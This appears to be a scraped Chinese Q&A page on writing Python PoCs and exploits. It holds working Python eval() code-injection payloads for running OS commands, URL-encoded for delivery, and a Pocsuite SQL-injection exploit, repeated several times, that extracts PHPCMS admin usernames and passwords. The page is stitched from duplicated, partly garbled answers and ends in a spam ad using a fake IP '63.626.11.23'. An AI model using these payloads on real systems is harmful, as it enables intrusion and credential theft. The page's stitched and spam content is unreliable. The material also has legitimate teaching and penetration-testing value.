❶ 如何使用python查找網站漏洞
如果你的Web應用中存在Python代碼注入漏洞的話,攻擊者就可以利用你的Web應用來向你後台伺服器的Python解析器發送惡意Python代碼了。這也就意味著,如果你可以在目標伺服器中執行Python代碼的話,你就可以通過調用伺服器的操作系統的指令來實施攻擊了。通過運行操作系統命令,你不僅可以對那些可以訪問到的文件進行讀寫操作,甚至還可以啟動一個遠程的互動式Shell(例如nc、Metasploit和Empire)。
為了復現這個漏洞,我在最近的一次外部滲透測試過程中曾嘗試去利用過這個漏洞。當時我想在網上查找一些關於這個漏洞具體應用方法的信息,但是並沒有找到太多有價值的內容。在同事Charlie Worrell(@decidedlygray)的幫助下,我們成功地通過Burp POC實現了一個非互動式的shell,這也是我們這篇文章所要描述的內容。
因為除了Python之外,還有很多其他的語言(例如Perl和Ruby)也有可能出現代碼注入問題,因此Python代碼注入屬於伺服器端代碼注入的一種。實際上,如果各位同學和我一樣是一名CWE的關注者,那麼下面這兩個CWE也許可以給你提供一些有價值的參考內容:
1. CWE-94:代碼生成控制不當(『代碼注入』)2. CWE-95:動態代碼評估指令處理不當(『Eval注入』)漏洞利用
假設你現在使用Burp或者其他工具發現了一個Python注入漏洞,而此時的漏洞利用Payload又如下所示:
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))那麼你就可以使用下面這個Payload來在目標主機中實現操作系統指令注入了:
eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))實際上,你甚至都不需要使用for循環,直接使用全局函數「__import__」就可以了。具體代碼如下所示:
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))其實我們的Payload代碼還可以更加簡潔,既然我們已經將import和popen寫在了一個表達式裡面了,那麼在大多數情況下,你甚至都不需要使用compile了。具體代碼如下所示:
__import__('os').popen('COMMAND').read()
為了將這個Payload發送給目標Web應用,你需要對其中的某些字元進行URL編碼。為了節省大家的時間,我們在這里已經將上面所列出的Payload代碼編碼完成了,具體如下所示:
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29接下來,我們將會給大家介紹關於這個漏洞的細節內容,並跟大家分享一個包含這個漏洞的Web應用。在文章的結尾,我將會給大家演示一款工具,這款工具是我和我的同事Charlie共同編寫的,它可以明顯降低你在利用這個漏洞時所花的時間。簡而言之,這款工具就像sqlmap一樣,可以讓你快速找到SQL注入漏洞,不過這款工具仍在起步階段,感興趣的同學可以在項目的GitHub主頁[傳送門]中與我交流一下。
搭建一個包含漏洞的伺服器
為了更好地給各位同學進行演示,我專門創建了一個包含漏洞的Web應用。如果你想要自己動手嘗試利用這個漏洞的話,你可以點擊這里獲取這份Web應用。接下來,我們要配置的就是Web應用的運行環境,即通過pip或者easy_install來安裝web.py。它可以作為一台獨立的伺服器運行,或者你也可以將它載入至包含mod_wsgi模塊的Apache伺服器中。相關操作指令如下所示:
git clone https://github.com/sethsec/PyCodeInjection.gitcd VulnApp
./install_requirements.sh
python PyCodeInjectionApp.py
漏洞分析
當你在網上搜索關於python的eval()函數時,幾乎沒有文章會提醒你這個函數是非常不安全的,而eval()函數就是導致這個Python代碼注入漏洞的罪魁禍首。如果你遇到了下面這兩種情況,說明你的Web應用中存在這個漏洞:
1. Web應用接受用戶輸入(例如GET/POST參數,cookie值);2. Web應用使用了一種不安全的方法來將用戶的輸入數據傳遞給eval()函數(沒有經過安全審查,或者缺少安全保護機制);下圖所示的是一份包含漏洞的示例代碼:
\
大家可以看到,eval()函數是上述代碼中唯一一個存在問題的地方。除此之外,如果開發人員直接對用戶的輸入數據(序列化數據)進行拆封的話,那麼Web應用中也將會出現這個漏洞。
不過需要注意的是,除了eval()函數之外,Python的exec()函數也有可能讓你的Web應用中出現這個漏洞。而且據我所示,現在很多開發人員都會在Web應用中不規范地使用exec()函數,所以這個問題肯定會存在。
自動掃描漏洞
為了告訴大家如何利用漏洞來實施攻擊,我通常會使用掃描器來發現一些我此前沒有見過的東西。找到之後,我再想辦法將毫無新意的PoC開發成一個有意義的exploit。不過我想提醒大家的是,不要過度依賴掃描工具,因為還很多東西是掃描工具也找不到的。
這個漏洞也不例外,如果你在某個Web應用中發現了這個漏洞,那麼你肯定使用了某款自動化的掃描工具,比如說Burp Suite Pro。目前為止,如果不使用類似Burp Suite Pro這樣的專業掃描工具,你幾乎是無法發現這個漏洞的。
當你搭建好測試環境之後,啟動並運行包含漏洞的示例應用。接下來,使用Burp Suite Pro來對其進行掃描。掃描結果如下圖所示:
\
下圖顯示的是Burp在掃描這個漏洞時所使用的Payload:
\
我們可以看到,Burp之所以要將這個Web應用標記為「Vulnerable」(包含漏洞的),是因為當它將這個Payload發送給目標Web應用之後,伺服器的Python解析器休眠了20秒,響應信息在20秒之後才成功返回。但我要提醒大家的是,這種基於時間的漏洞檢查機制通常會存在一定的誤報。
將PoC升級成漏洞利用代碼
使用time.sleep()來驗證漏洞的存在的確是一種很好的方法。接下來,為了執行操作系統指令並接收相應的輸出數據,我們可以使用os.popen()、subprocess.Popen()、或者subprocess.check_output()這幾個函數。當然了,應該還有很多其他的函數同樣可以實現我們的目標。
因為eval()函數只能對表達式進行處理,因此Burp Suite Pro的Payload在這里使用了compile()函數,這是一種非常聰明的做法。當然了,我們也可以使用其他的方法來實現,例如使用全局函數「__import__」。關於這部分內容請查閱參考資料:[參考資料1][參考資料2]
下面這個Payload應該可以適用於絕大多數的場景:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Example with one expression
__import__('os').popen('COMMAND').read()
# Example with multiple expressions, separated by commasstr("-"*50),__import__('os').popen('COMMAND').read()如果你需要執行一個或多個語句,那麼你就需要使用eval()或者compile()函數了。實現代碼如下所示:
# Examples with one expression
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True)""",'','single'))#Examples with multiple statements, separated by semicolonseval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True);import time;time.sleep(2)""",'','single'))在我的測試過程中,有時全局函數「__import__」會不起作用。在這種情況下,我們就要使用for循環了。相關代碼如下所示:
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))如果包含漏洞的參數是一個GET參數,那麼你就可以直接在瀏覽器中利用這個漏洞了:
\
請注意:雖然瀏覽器會幫你完成絕大部分的URL編碼工作,但是你仍然需要對分號(%3b)和空格(%20)進行手動編碼。除此之外,你也可以直接使用我們所開發的工具。
如果是POST參數的話,我建議各位直接使用類似Burp Repeater這樣的工具。如下圖所示,我在subprocess.check_output()函數中一次性調用了多個系統命令,即pwd、ls、-al、whoami和ping。
\
\
漏洞利用工具-PyCodeInjectionShell
你可以直接訪問PyCodeInjectionShell的GitHub主頁獲取工具源碼,我們也提供了相應的工具使用指南。在你使用這款工具的過程中會感覺到,它跟sqlmap一樣使用起來非常的簡單。除此之外,它的使用方法跟sqlmap基本相同。
❷ 《徹底研究黑客編程技術揭秘與攻防實戰》這本書的代碼用什麼語言寫出來的
黑客一般都掌握多種編程語言,他們不但掌握著與底層相關的如匯編、C之類的編程語言,而且還掌握很多腳本語言,如Python、Perl、Ruby .......很多黑客在發現ODay以後用Perl或者Python來寫POC; MSF使用的是Ruby來進行開發Exploit;有的黑客在反病毒時竟然寫個批處理就搞定了……對於黑客來說,一切語言都是服務於自己的思想的,只要能快速實現自己的想法,能完成自己所要完 成的功能就行,從不拘泥於任何語言和工具。在網上有很多學習不同編程語言的人們之間經常互相攻擊,這其實是一種極端的行為,大家還是理性地對待這些問題比較好
❸ 基於Python 來編寫 Poc/Exp 該怎麼入門
1Requests : 模擬Web的請求和響應等交互動作。 2Re : 正則表達式,用來驗證返回的結果是否符合漏洞的預期,從而驗證漏洞是否存在。基於Python 來編寫 Poc/Exp 該怎麼入門
❹ 基於Python 來編寫 Poc/Exp 該怎麼入門
Pocsuite官方文檔例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['http://www.sebug.net/vuldb/ssvid-62274']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = 'http://www.phpcms.cn'
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中廣告模塊,存在參數過濾不嚴,
導致了sql注入漏洞,如果對方伺服器開啟了錯誤顯示,可直接利用,
如果關閉了錯誤顯示,可以採用基於時間和錯誤的盲注
'''
samples = ['http://10.1.200.28/']
def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry '1--(.+)---(.+)--' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and '' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
❺ python exp漏洞怎麼用
首先,我們需要知道這個漏洞,也就是發現漏洞
然後,我們需要知道這個漏洞原理,也就是了解原理
其次,我們需要搭建環境,或者是網上找環境了解這個漏洞使用的流程
最後,我們才是編寫exp和poc!
❻ 如何使用python編寫poc,exp
然後來談談自己的看法:
其實吧,無論烏雲的Tangscan也好,知道創宇的Pocsuite也好,還有Beebeeto也好(Bugscan沒寫過,不是特別了解不過應該差不多),關於Web的Poc和Exp,都極度依賴於兩個Python庫。
1. Requests : 模擬Web的請求和響應等交互動作。
2. Re : 正則表達式,用來驗證返回的結果是否符合漏洞的預期,從而驗證漏洞是否存在。
其餘的大部分代碼都是漏洞的信息。
Pocsuite官方文檔例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from t import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = ''
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中廣告模塊,存在參數過濾不嚴,
導致了sql注入漏洞,如果對方伺服器開啟了錯誤顯示,可直接利用,
如果關閉了錯誤顯示,可以採用基於時間和錯誤的盲注
'''
samples = ['']
def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and '' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
可以看到從代碼11到28行都是漏洞的一些信息,真正的功能函數只有_attack和_verify兩個而已。甚至這個例子有點繁瑣了,現在大大們都是把exploit寫在verify裡面,所以真正起到功能的,也就不到十行的代碼。pocsuite.net 這個庫其實就是Requests。用Requests模擬手工注入的Post提交,用正則匹配提取和驗證必要信息,簡單說起來就是這兩個步驟。
這么一來你再看看其他的由Python寫的Poc和Exp就大同小異了。Poc/Exp總的說來就只是用程序代替手工的過程而已,所以了解了漏洞的原理和認證方法之後就簡單了。
代碼很簡單最主要的,還是對於漏洞的理解。
先說到這里,有空之後再寫一些別的。
❼ 基於Python 來編寫 Poc/Exp 該怎麼入門
如果你想學習機器學習方面的時候,你需要先看一下這方面的理論,跟哪個語言無關,知道你理解了機器學習,你才需要使用編程語言來實現你的想法。
推薦你看
機器學習系統設計
這本書就是使用python學習機器學習的。
如果解決了您的問題請採納!
如果未解決請繼續追問
❽ 如何使用python編寫poc,exp
可以看一下這個網頁/question/37256155介紹了幾個方法
❾ 基於Python 來編寫 Poc/Exp 該怎麼入門
其實吧,無論烏雲的Tangscan也好,知道創宇的Pocsuite也好,還有Beebeeto也好(Bugscan沒寫過,不是特別了解不過應該差不多),關於Web的Poc和Exp,都極度依賴於兩個Python庫。
1. Requests : 模擬Web的請求和響應等交互動作。
2. Re : 正則表達式,用來驗證返回的結果是否符合漏洞的預期,從而驗證漏洞是否存在。
其餘的大部分代碼都是漏洞的信息。
以Pocsuite和Tangscan為例:
Pocsuite官方文檔例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['http://www.sebug.net/vuldb/ssvid-62274']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = 'http://www.phpcms.cn'
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中廣告模塊,存在參數過濾不嚴,
導致了sql注入漏洞,如果對方伺服器開啟了錯誤顯示,可直接利用,
如果關閉了錯誤顯示,可以採用基於時間和錯誤的盲注
'''
samples = ['http://10.1.200.28/']
def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and '' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
可以看到從代碼11到28行都是漏洞的一些信息,真正的功能函數只有_attack和_verify兩個而已。甚至這個例子有點繁瑣了,現在大大們都是把exploit寫在verify裡面,所以真正起到功能的,也就不到十行的代碼。http://pocsuite.net這個庫其實就是Requests。用Requests模擬手工注入的Post提交,用正則匹配提取和驗證必要信息,簡單說起來就是這兩個步驟。
這么一來你再看看其他的由Python寫的Poc和Exp就大同小異了。Poc/Exp總的說來就只是用程序代替手工的過程而已,所以了解了漏洞的原理和認證方法之後就簡單了。
❿ 新手學習滲透從哪裡開始
首先要根據自己的實際情況、確定學習的路線和方向的。就像建大樓,從頂端最華麗的那個地方開始,不可能成功。學滲透測試也一樣,沒選對入手的地方,導致學習過程中由於欠缺很多的知識點、很多概念理解不了、學習舉步維艱、很容易半途而廢。
現在我來分析下:
滲透測試屬於信息安全行業,准確的說是網路計算機/IT行業
知道它行業屬性,你大概就能清楚需要些什麼樣的基礎知識了;下面是我從非計算機網路相關專業的同學想要學習滲透測試必須掌握的知識。
1)了解基本的網路知識、什麼是IP地址(63.626.11.23)、IP地址的基本概念、IP段劃分、什麼是A段、B段、C段等
廣域網、區域網、相關概念和IP地址劃分范圍。
2)埠的基本概念?埠的分類?
3)域名的基本概念、什麼是URL、了解TCP/IP協議、
5)了解開放式通信系統互聯參考模型(OSI)
6)了解http(超文本傳輸協議)協議概念、工作原理
7)了解WEB的靜態頁面和WEB動態頁面,B/S和C/S結構
8)了解常見的伺服器、例如、Windows server2003、Linux、UNIX等
9)了解常見的資料庫、MySQL、Mssql、、Access、Oracle、db2等
10)了解基本的網路架構、例如:Linux + Apache + MySQL + php
11)了解基本的Html語言,就是打開網頁後,在查看源碼裡面的Html語言
12)了解一種基本的腳本語言、例如PHP或者asp,jsp,cgi等
然後你想學習入門,需要學習以下最基礎的知識:
1、開始入門學習路線
1)深入學習一種資料庫語言,建議從MySQL資料庫或者SQL Server資料庫、簡單易學且學會了。
其他資料庫都差不多會了。
2)開始學習網路安全漏洞知識、SQL注入、XSS跨站腳本漏洞、CSRF、解析漏洞、上傳漏洞、命令執行、弱口令、萬能密碼、文件包含漏洞、本地溢出、遠程溢出漏洞等等
3)工具使用的學習、御劍、明小子、啊D、穿山甲(Pangolin)、Sqlmap、burpsuite抓包工具等等
2、Google hacker 語法學習
3、漏洞利用學習、SQL注入、XSS、上傳、解析漏洞等
4、漏洞挖掘學習
5、想成為大牛的話、以上都是皮毛中的皮毛,但前提是以上的皮毛都是最基礎的。
6、Linux系統命令學習、kali Linux 裡面的工具學習、Metesploit學習
7、沒事多逛逛安全論壇、看看技術大牛的文章、漏洞分析文章等
8、深入學習一門語言、Java或者Python等等,建議學習從Python開始學習、簡單易學,容易上手。我就是從IP地址(63.626.11.23)學起的,IP去掉點就是扣扣學習群,視頻資料非常全面、裡面各類滲透工具都有。注入的、掃描的、爆破的、等等。
9、如果你很懶的話,不想去找這些資料、還不想花大把錢去報培訓班,給你推薦個扣扣群IP去點就是。裡面有很多入門視頻資料和很全面各種技術大牛筆記資料、分析文章、後期內網滲透資料等等。
10、提升自己的專業能力、把自己練成一個技術大牛、能給你帶來一份穩定的高薪水工作,同時你還可利用自己的技術,額外的接些單子,做做副業,這個行業里是有很多單子可以接的。
如果你在提升自己上面連5塊錢都捨不得投資,那我真的不知道你的未來在哪裡。